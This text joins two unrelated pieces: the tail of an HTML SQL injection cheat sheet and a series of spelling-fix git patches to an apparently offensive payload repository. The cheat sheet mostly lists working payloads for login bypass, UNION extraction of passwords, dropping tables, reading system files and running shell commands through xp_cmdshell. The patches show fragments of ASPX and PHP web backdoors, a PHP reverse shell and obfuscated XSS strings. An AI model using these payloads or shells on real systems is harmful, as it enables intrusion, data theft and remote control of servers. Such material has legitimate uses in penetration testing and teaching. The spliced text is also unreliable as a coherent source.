bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>Java</strong></td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>        <td bgcolor="#333333"> </td>     </tr>   </tbody></table>  <p class="idea"> </p>  <p class="idea"><strong><a id="AboutMySQLandPHP" name="AboutMySQLandPHP"></a>About MySQL and PHP;</strong>     <br />To clarify some issues;     <br /><strong>PHP - MySQL doesn't support stacked queries</strong>, Java doesn't support stacked queries (<em>I'm sure for ORACLE, not quite sure about other databases</em>). <em>Normally MySQL supports stacked queries but because of database layer in most of the configurations it’s not possible to execute second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?</em></p>  <h5><a id="StackedSamples" name="StackedSamples"></a>Stacked SQL Injection Attack Samples </h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <code>10;DROP members --</code> </li>    <li><code>SELECT * FROM products WHERE id = 10<span class="hi">; DROP members--</span></code> </li> </ul>  <p class="idea">This will run <em>DROP members</em> SQL sentence after normal SQL Query.     <br /></p>  <h3><a id="IfStatements" name="IfStatements"></a>If Statements </h3>  <p class="idea">Get response based on a if statement. This is <strong>one of the key points of Blind SQL Injection</strong>, also can be very useful to test simple stuff blindly and <strong>accurately</strong>.</p>  <h4><a id="MySQLIf" name="MySQLIf"></a>MySQL If Statement</h4>  <ul>   <li><code>IF(<strong><em>condition</em>,<em>true-part</em>,<em>false-part</em></strong>) </code>(M)<code>        <br />SELECT IF(1=1,'true','false')</code> </li> </ul>  <h4><a id="SQLServerIf" name="SQLServerIf"></a>SQL Server If Statement </h4>  <ul>   <li><code>IF <strong><em>condition</em></strong> <strong><em>true-part</em></strong> ELSE <strong><em>false-part</em></strong></code> (S)       <br /><code>IF (1=1) SELECT 'true' ELSE SELECT 'false'</code> </li> </ul>  <h5><a id="SampleIfStatements" name="SampleIfStatements"></a>If Statement SQL Injection Attack Samples </h5>  <p><code>if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0</code> (S)     <br /><span class="idea">This will throw an <strong>divide by zero error</strong> if current logged user is not <strong>"sa" or "dbo"</strong>.</span></p>  <h3><a id="UsingIntegers" name="UsingIntegers"></a>Using Integers </h3>  <p class="idea">Very useful for bypassing, <strong>magic_quotes() and similar filters</strong>, or even WAFs. </p>  <ul type="disc">   <li><code>0x<em>HEXNUMBER</em></code> (SM)       <br /><span class="idea">You can  write hex like these;</span>       <br />      <br /><code>SELECT CHAR(0x66)</code> (S)       <br /><code>SELECT 0x5045</code> <span class="idea">(<em>this is not an integer it will be a string from Hex</em>)</span> (M)       <br /><code>SELECT 0x50 + 0x45</code> <span class="idea">(<em>this is integer now!</em>)</span> (M) </li> </ul>  <h3><a id="StringOperations" name="StringOperations"></a>String  Operations </h3>  <p class="idea">String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.</p>  <h4><a id="StringConcat" name="StringConcat"></a>String Concatenation </h4>  <ul type="disc">   <li><code>+</code> (S)       <br /><code>SELECT login <span class="hi">+ '-' +</span> password FROM members</code>       <br />      <br /></li>    <li><code>||</code> (*MO)       <br /><code>SELECT login <span class="hi">|| '-' ||</span> password FROM members </code></li> </ul>  <p class="idea"><strong>*About MySQL "||";</strong>     <br />If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. Better way to do it is using <code>CONCAT()</code> function in MySQL.</p>  <ul type="disc">   <li><code>CONCAT(str1, str2, str3, ...)</code> (M)       <br /><span class="idea">Concatenate supplied strings.</span>       <br /><code>SELECT <span class="hi">CONCAT(login, password)</span> FROM members</code> </li> </ul>  <h3><a id="StringwithoutQuotes" name="StringwithoutQuotes"></a>Strings without Quotes </h3>  <p class="idea">These are some direct ways to using strings but it’s always possible to use <code>CHAR()</code>(MS) and <code>CONCAT()</code>(M) to generate string without quotes.</p>  <ul type="disc">   <li><code>0x457578</code> (M) - <span class="idea">Hex Representation of string </span>      <br /><code>SELECT 0x457578</code>       <br /><span class="idea">This will be selected as string in MySQL.</span>       <br />      <br /><span class="idea">In MySQL easy way to generate hex representations of strings use this;</span>       <br /><code>SELECT CONCAT('0x',HEX('c:\\boot.ini'))</code>       <br />      <br /></li>    <li><span class="idea">Using <code>CONCAT()</code> in MySQL</span>       <br /><code>SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))</code> (M)       <br /><span class="idea">This will return ‘KLM’.</span>       <br />      <br /></li>    <li><code>SELECT CHAR(75)+CHAR(76)+CHAR(77)</code> (S)       <br /><span class="idea">This will return ‘KLM’. </span></li> </ul>  <h4><a id="HexbasedSamples" name="HexbasedSamples"></a>Hex based SQL Injection Samples</h4>  <ul>   <li><code>SELECT LOAD_FILE(<span class="hi">0x633A5C626F6F742E696E69</span>)</code> (M)       <br /><span class="idea">This will show the content of <strong>c:\boot.ini</strong></span> </li> </ul>  <h3><a id="StringModification" name="StringModification"></a>String Modification & Related </h3>  <ul type="disc">   <li><code>ASCII()</code> (SMP)       <br /><span class="idea">Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.</span>       <br />      <br /><code>SELECT ASCII('a')</code>       <br />      <br /></li>    <li><code>CHAR()</code> (SM)       <br /><span class="idea">Convert an integer of ASCII.</span>       <br />      <br /><code>SELECT CHAR(64)</code> </li> </ul>  <h2><a id="UnionInjections" name="UnionInjections"></a>Union Injections</h2>  <p class="idea">With union you do SQL queries cross-table. Basically you can poison query to return records from another table. </p>  <p><code>SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members </code>    <br /><span class="idea">This will combine results from both news table and members table and return all of them. </span></p>  <p><span class="idea">Another Example : </span>    <br /><code>' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</code></p>  <h3><a id="UnionLanguageIssues" name="UnionLanguageIssues"></a>UNION – Fixing Language Issues</h3>  <p class="idea">While exploiting Union injections sometimes you get errors because of different language settings (<em>table settings, field settings, combined table / db settings etc.</em>) these functions are quite useful to fix this problem. It's rare but if you dealing with <em>Japanese, Russian, Turkish</em> etc. applications then you will see it. </p>  <ul>   <li>SQL Server (S)      <br />Use <span class="hi"><code>field</code> <strong><code>COLLATE</code></strong><code> SQL_Latin1_General_Cp1254_CS_AS</code></span> or some other valid one - <em>check out SQL Server documentation</em>.       <br />      <br /><code>SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members</code>       <br />      <br /></li>    <li>MySQL (M)      <br /><code>Hex() </code><span class="idea">for every possible issue</span> </li> </ul>  <h3><a id="ByPassingLoginScreens" name="ByPassingLoginScreens"></a>Bypassing Login Screens (SMO+) </h3> <span class="idea"><em>SQL Injection 101</em>, Login tricks </span>  <ul>   <li><code>admin' -- </code></li>    <li><code>admin' # </code></li>    <li><code>admin'/*</code> </li>    <li><code>' or 1=1--</code> </li>    <li><code>' or 1=1#</code> </li>    <li><code>' or 1=1/*</code> </li>    <li><code>') or '1'='1--</code> </li>    <li><code>') or ('1'='1--</code> </li>    <li>.... </li> </ul>  <ul>   <li>Login as different user (SM*)      <br /><code>' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</code> </li> </ul>  <p><em>*Old versions of MySQL doesn't support union queries </em></p>  <h3><a id="UnionLanguageIssues" name="UnionLanguageIssues"></a>Bypassing second MD5 hash check login screens </h3>  <p class="idea">If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database. </p>  <h4><a id="BypassingMD5Hash" name="BypassingMD5Hash"></a>Bypassing MD5 Hash Check Example (MSP) </h4>  <p><span class="inputfield">Username :</span><code> admin</code>     <br /><span class="inputfield">Password :</span> <code>1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</code></p>  <p><code>81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234) </code></p>  <h3> </h3>  <h3>Error Based - Find Columns Names </h3>  <h4>Finding Column Names with <strong>HAVING BY</strong> - Error Based (S) </h4>  <p><em>In the same order, </em></p>  <ul>   <li>'<code> HAVING 1=1 -- </code></li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1</strong> HAVING 1=1 -- </code></li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1, columnfromerror2</strong> HAVING 1=1 --</code> </li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1, columnfromerror2, columnfromerror(n) </strong>HAVING 1=1 --</code> <em>and so on</em> </li>    <li>If you are not getting any more error then it's done. </li> </ul>  <h4>Finding how many columns in SELECT query by <strong>ORDER BY</strong> <strong>(MSO+)</strong></h4>  <p>Finding column number by ORDER BY can speed up the UNION SQL Injection process.</p>  <ul>   <li><code>ORDER BY 1-- </code></li>    <li><code>ORDER BY 2--</code> </li>    <li><code>ORDER BY N--</code> <em>so on</em> </li>    <li>Keep going until get an error. Error means you found the number of selected columns. </li> </ul>  <h3>Data types, UNION, etc. </h3>  <h4>Hints,</h4>  <ul>   <li>Always use <strong>UNION</strong> with <strong>ALL </strong>because of <strong>image</strong> similiar non-distinct field types. By default union tries to get records with distinct. </li>    <li>To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (<em>if injection is in WHERE</em>). This can be critical if you are only getting one result at a time. </li>    <li>Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.      <ul>       <li>Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (<em>because normally developers are not expecting to see NULL in a username field</em>) </li>     </ul>   </li> </ul>  <h4>Finding Column Type </h4>  <ul>   <li><code>' union select <span class="hi">sum(<strong>columntofind</strong>)</span> from <strong>users</strong>--</code> (S)       <br /><code>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'        <br />[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a <strong class="hi">varchar</strong> data type as an argument.</code>       <br />      <br /><em>If you are not getting error it means </em>column is numeric.       <br />      <br /></li>    <li>Also you can use <span class="hi">CAST()</span> or <span class="hi">CONVERT()</span>       <ul>       <li><code>SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--</code>           <br />          <br /></li>     </ul>   </li>    <li><code>11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-</code>       <br />No Error - Syntax is right. MS SQL Server Used. Proceeding.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-</code>       <br />No Error – First column is an integer.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 -- </code>      <br />Error! – Second column is not an integer.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-</code>       <br />No Error – Second column is a string.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-</code>       <br />Error! – Third column is not an integer. ...       <br />      <br /><code>Microsoft OLE DB Provider for SQL Server error '80040e07'        <br />Explicit conversion from data type <span class="hi"><strong>int</strong> to image</span> is not allowed.</code> </li> </ul>  <p><strong>You’ll get convert() errors before union target errors ! </strong>So<strong> </strong>start with<strong> </strong>convert() then union<strong></strong></p>  <h3>Simple Insert (MSO+) </h3> <code>'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*</code>   <h3>Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes</h3>  <p><strong>@@version</strong> (MS)     <br />Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also you can use insert, update statements or in functions. </p>  <p><code>INSERT INTO members(id, user, pass) VALUES(1, ''+<span class="hi">SUBSTRING(@@version,1,10)</span> ,10)</code></p>  <h4><a id="BulkInsert" name="BulkInsert"></a>Bulk Insert (S) </h4>  <p>Insert a file content to a table. If you don't know internal path of web application you can <strong>read IIS (</strong><em>IIS 6 only</em><strong>) metabase file </strong>(<em>%systemroot%\system32\inetsrv\MetaBase.xml</em>) and then search in it to identify application path. </p>  <ol>   <ol>     <li>Create table foo( line varchar(8000) ) </li>      <li>bulk insert foo from 'c:\inetpub\wwwroot\login.asp' </li>      <li><em>Drop temp table, and repeat for another file. </em></li>   </ol> </ol>  <h4>BCP (S) </h4>  <p>Write text file. Login Credentials are required to use this function.    <br /><code>bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar </code></p>  <h4>VBS, WSH in SQL Server (S) </h4>  <p>You can use VBS, WSH scripting in SQL Server because of ActiveX support. </p>  <p><code>declare @o int      <br />exec sp_oacreate 'wscript.shell', @o out       <br />exec sp_oamethod @o, 'run', NULL, 'notepad.exe'       <br /></code><code><em>Username:</em> '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --       <br /></code></p>  <h4>Executing system commands, xp_cmdshell (S) </h4>  <p>Well known trick, By default it's disabled in <em>SQL Server 2005. </em>You need to have admin access. </p>  <p><code>EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'</code>     <br /></p>  <p>Simple ping check (<em>configure your firewall or sniffer to identify request before launch it</em>), </p>  <p><code>EXEC master.dbo.xp_cmdshell 'ping <ip address>'</code></p>  <p>You can not read results directly from error or union or something else. </p>  <h4>Some Special Tables in SQL Server (S) </h4>  <ul>   <li>Error Messages      <br /><code>master..sysmessages </code>      <br />      <br /></li>    <li>Linked Servers      <br /><code>master..sysservers</code>       <br />      <br /></li>    <li>Password (<em>2000 and 20005 both can be crackable, they use very similar hashing algorithm </em>)       <br />SQL Server 2000:<code> masters..sysxlogins</code>       <br />SQL Server 2005 : <code>sys.sql_logins        <br /></code></li> </ul>  <h4>More Stored Procedures for SQL Server (S) </h4>  <ol>   <li>Cmd Execute (<strong>xp_cmdshell</strong>)       <br />exec master..xp_cmdshell 'dir'       <br />      <br /></li>    <li>Registry Stuff (<strong>xp_regread</strong>)       <br />      <ol>       <li>xp_regaddmultistring </li>        <li>xp_regdeletekey </li>        <li>xp_regdeletevalue </li>        <li>xp_regenumkeys </li>        <li>xp_regenumvalues </li>        <li>xp_regread </li>        <li>xp_regremovemultistring </li>        <li>xp_regwrite          <br />exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'           <br />exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'           <br />          <br /></li>     </ol>   </li>    <li>Managing Services (<strong>xp_servicecontrol</strong>)       <br /></li>    <li>Medias (<strong>xp_availablemedia</strong>)       <br /></li>    <li>ODBC Resources (<strong>xp_enumdsn</strong>)       <br /></li>    <li>Login mode (<strong>xp_loginconfig</strong>)       <br /></li>    <li>Creating Cab Files (<strong>xp_makecab</strong>)       <br /></li>    <li>Domain Enumeration (<strong>xp_ntsec_enumdomains</strong>)       <br /></li>    <li>Process Killing (<em>need PID</em>) (<strong>xp_terminate_process</strong>)       <br /></li>    <li>Add new procedure (<em>virtually you can execute whatever you want</em>)       <br />sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’       <br />exec xp_webserver </li>    <li>Write text file to a UNC or an internal path (sp_makewebtask)      <br /></li> </ol>  <h4>MSSQL Bulk Notes </h4>  <p><code>SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/ </code></p>  <p><code>DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0</code></p>  <p>HOST_NAME()    <br />IS_MEMBER (Transact-SQL)  <br />IS_SRVROLEMEMBER (Transact-SQL)  <br />OPENDATASOURCE (Transact-SQL) </p>  <pre>INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"</pre>
 
 <p>OPENROWSET (Transact-SQL)  - <a href="http://msdn2.microsoft.com/en-us/library/ms190312.aspx">http://msdn2.microsoft.com/en-us/library/ms190312.aspx</a></p>
 

From 84275a9e48993bb41e0d1f4268a2b1485b0c7e5b Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:59 -0400
Subject: [PATCH 19/59] spelling: escape

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
index fd4fb777..f9016dc9 100644
--- a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
+++ b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
@@ -605,7 +605,7 @@ <h4>vinnu - <em>12.02.2010</em></h4>
         <img src="/avatar/-1637195092/" width="64" height="64" alt="" />
     </div>
     <h4>vinnu - <em>12.02.2010</em></h4>
-    <p>           Also in case if u r just pairing single quotes, then u can easily ecape one of the single quote using a forward slash &quot;\&quot;.<br />This will again break the SQL query and will inject the parameter as a SQL query.</p>
+    <p>           Also in case if u r just pairing single quotes, then u can easily escape one of the single quote using a forward slash &quot;\&quot;.<br />This will again break the SQL query and will inject the parameter as a SQL query.</p>
 </div>
 <div class="comment" >
     <div class="commentd">

From fc511bd25f9054c8502791a6dc2caf83eafa1fa3 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:00 -0400
Subject: [PATCH 20/59] spelling: evaluate

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
index 0fd330c1..64707b52 100644
--- a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
+++ b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
@@ -1274,7 +1274,7 @@ Author Name: PHPIDS Group
 Self-contained XSS variant 2
 Exploit Name: Self-contained XSS variant 2
 Exploit String: a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
-Exploit Description: Concatenates fragmented functions to evakuate the location hash
+Exploit Description: Concatenates fragmented functions to evaluate the location hash
 Exploit Tags: general, self contained
 Author Name: PHPIDS Group
 

From 4e5dcea354455a39d282cec05c1c99fcc1651a68 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:01 -0400
Subject: [PATCH 21/59] spelling: execute

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/asp/cmdasp.aspx | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/web-backdoors/asp/cmdasp.aspx b/web-backdoors/asp/cmdasp.aspx
index b420c875..36ffc156 100644
--- a/web-backdoors/asp/cmdasp.aspx
+++ b/web-backdoors/asp/cmdasp.aspx
@@ -5,7 +5,7 @@
 void Page_Load(object sender, EventArgs e)
 {
 }
-string ExcuteCmd(string arg)
+string ExecuteCmd(string arg)
 {
 ProcessStartInfo psi = new ProcessStartInfo();
 psi.FileName = "cmd.exe";
@@ -21,7 +21,7 @@ return s;
 void cmdExe_Click(object sender, System.EventArgs e)
 {
 Response.Write("<pre>");
-Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
+Response.Write(Server.HtmlEncode(ExecuteCmd(txtArg.Text)));
 Response.Write("</pre>");
 }
 </script>
@@ -32,7 +32,7 @@ Response.Write("</pre>");
 <body >
 <form id="cmd" method="post" runat="server">
 <asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
-<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
+<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdExe_Click"></asp:Button>
 <asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
 </form>
 </body>

From 500783d8f440907291cdfc3cd7c1da97f6bc0307 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:03 -0400
Subject: [PATCH 22/59] spelling: extension

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/pl-cgi/up.pl | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/web-backdoors/pl-cgi/up.pl b/web-backdoors/pl-cgi/up.pl
index a335611b..5692239b 100755
--- a/web-backdoors/pl-cgi/up.pl
+++ b/web-backdoors/pl-cgi/up.pl
@@ -39,7 +39,7 @@
 # change the value to 0 if you do not want to overwrite an existing file.
 my $g_overwrite=1;
 
-# if you want to restrict upload to files with certain extentions, change
+# if you want to restrict upload to files with certain extensions, change
 # the value of $g_restrict_by_ext=1 and ALSO modify the @g_allowed_ext if you
 # want to add other allowable extensions.
 my $g_restrict_by_ext=0;
@@ -281,7 +281,7 @@ sub doWork
     #    return;
     #}
 
-    # if you want to restrict upload to files with certain extention
+    # if you want to restrict upload to files with certain extension
     if ($g_restrict_by_ext == 1)
     {
         my $file=$q::upload_file;

From a01fa8e7a69a08f56891c17179e9e7c2140872a6 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 21:10:14 -0400
Subject: [PATCH 23/59] spelling: forwarded

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/asp/shell.aspx | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/web-backdoors/asp/shell.aspx b/web-backdoors/asp/shell.aspx
index b6df6cbb..3e07e618 100644
--- a/web-backdoors/asp/shell.aspx
+++ b/web-backdoors/asp/shell.aspx
@@ -57,7 +57,7 @@ void Page_Load(object sender, System.EventArgs e) {
 	// Check for an IP in the range we want
 	string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
 	
-	// check if the X-Fordarded-For header exits
+	// check if the X-Forwarded-For header exits
 	string remoteIp;
 	if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
 		remoteIp = Request.UserHostAddress;

From d346ea43540b8f3f6595aed73adc265148286005 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:05 -0400
Subject: [PATCH 24/59] spelling: generate

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/php/shell.php                 | 2 +-
 web-backdoors/wordpress/templates/shell.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/web-backdoors/php/shell.php b/web-backdoors/php/shell.php
index b5d61c06..c0c2d3e9 100644
--- a/web-backdoors/php/shell.php
+++ b/web-backdoors/php/shell.php
@@ -330,7 +330,7 @@ function init() {
 
 <?php
 if (!$_SESSION['authenticated']) {
-    /* Genereate a new nounce every time we preent the login page.  This binds
+    /* Generate a new nounce every time we preent the login page.  This binds
      * each login to a unique hit on the server and prevents the simple replay
      * attack where one uses the back button in the browser to replay the POST
      * data from a login. */
diff --git a/web-backdoors/wordpress/templates/shell.php b/web-backdoors/wordpress/templates/shell.php
index b5aeb21a..394efa63 100644
--- a/web-backdoors/wordpress/templates/shell.php
+++ b/web-backdoors/wordpress/templates/shell.php
@@ -310,7 +310,7 @@ function init() {
 
 <?php
 if (false) {
-    /* Genereate a new nounce every time we preent the login page.  This binds
+    /* Generate a new nounce every time we preent the login page.  This binds
      * each login to a unique hit on the server and prevents the simple replay
      * attack where one uses the back button in the browser to replay the POST
      * data from a login. */

From 05db824b70cc8dc11c8919adc33bcbd6ee47d893 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:07 -0400
Subject: [PATCH 25/59] spelling: handler

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
index 64707b52..2046c549 100644
--- a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
+++ b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
@@ -581,7 +581,7 @@ Exploit String: a=<a>
 </b>
 </a>
 document.write(unescape(a..b))
-Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context.
+Exploit Description: This vector writes an erroneous image tag with onerror handler inside an E4X construct into the document context.
 Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags
 Author Name: .mario
 

From fc48bd77b7800c41966a393a94da62745469bbc9 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:08 -0400
Subject: [PATCH 26/59] spelling: libraries

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 docs/misc/KL0209LIT_fffap.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docs/misc/KL0209LIT_fffap.html b/docs/misc/KL0209LIT_fffap.html
index 24e9b627..c4d0d6c9 100644
--- a/docs/misc/KL0209LIT_fffap.html
+++ b/docs/misc/KL0209LIT_fffap.html
@@ -569,7 +569,7 @@
 3.2 Writing the Fuzzer
 
 This example for SFTP fuzzing will be written in PERL and will be using libssh2/Net::SSH2 (this is not the only way to use
-and fuzz SFTP, other libaries and extensions that may be more extensive and/or low-level are available).
+and fuzz SFTP, other libraries and extensions that may be more extensive and/or low-level are available).
 
 [sftpfuzz.pl]
 

From c7420ac994d986a02044b5e57a4b7e1d12c51f12 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:10 -0400
Subject: [PATCH 27/59] spelling: obfuscated

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
index 2046c549..b8dec71c 100644
--- a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
+++ b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
@@ -1366,7 +1366,7 @@ content: “\61\6c\65\72\74\28\31\29″
 eval(eval(document.styleSheets[0].cssRules[0].style.content))
 </script>
 Exploit Description: This vector utilizes the CSS content property and fetches it off the document.styleSheets property afterwards. For correct execution of the payload a double-eval is needed.
-Exploit Tags: general, onfuscated, style injection
+Exploit Tags: general, obfuscated, style injection
 Author Name: .mario
 
 STYLE w/Anonymous HTML

From c20899cceee7836ed1eb6db7e2897cc5f918b6ab Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:09 -0400
Subject: [PATCH 28/59] spelling: occasionally

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/php/php-reverse-shell.php                 | 2 +-
 web-backdoors/wordpress/templates/php-reverse-shell.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/web-backdoors/php/php-reverse-shell.php b/web-backdoors/php/php-reverse-shell.php
index 05d48e5a..ab77aa22 100644
--- a/web-backdoors/php/php-reverse-shell.php
+++ b/web-backdoors/php/php-reverse-shell.php
@@ -118,7 +118,7 @@
 }
 
 // Set everything to non-blocking
-// Reason: Occsionally reads will block, even though stream_select tells us they won't
+// Reason: Occasionally reads will block, even though stream_select tells us they won't
 stream_set_blocking($pipes[0], 0);
 stream_set_blocking($pipes[1], 0);
 stream_set_blocking($pipes[2], 0);
diff --git a/web-backdoors/wordpress/templates/php-reverse-shell.php b/web-backdoors/wordpress/templates/php-reverse-shell.php
index cebec781..b7e7cb57 100644
--- a/web-backdoors/wordpress/templates/php-reverse-shell.php
+++ b/web-backdoors/wordpress/templates/php-reverse-shell.php
@@ -120,7 +120,7 @@
 }
 
 // Set everything to non-blocking
-// Reason: Occsionally reads will block, even though stream_select tells us they won't
+// Reason: Occasionally reads will block, even though stream_select tells us they won't
 stream_set_blocking($pipes[0], 0);
 stream_set_blocking($pipes[1], 0);
 stream_set_blocking($pipes[2], 0);

From b757f4fb8b3e36b70a05605b27ba923725167ebb Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:11 -0400
Subject: [PATCH 29/59] spelling: operator

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/php/dns.php                    | 2 +-
 web-backdoors/php/file.php                   | 2 +-
 web-backdoors/php/host.php                   | 2 +-
 web-backdoors/php/killnc.php                 | 2 +-
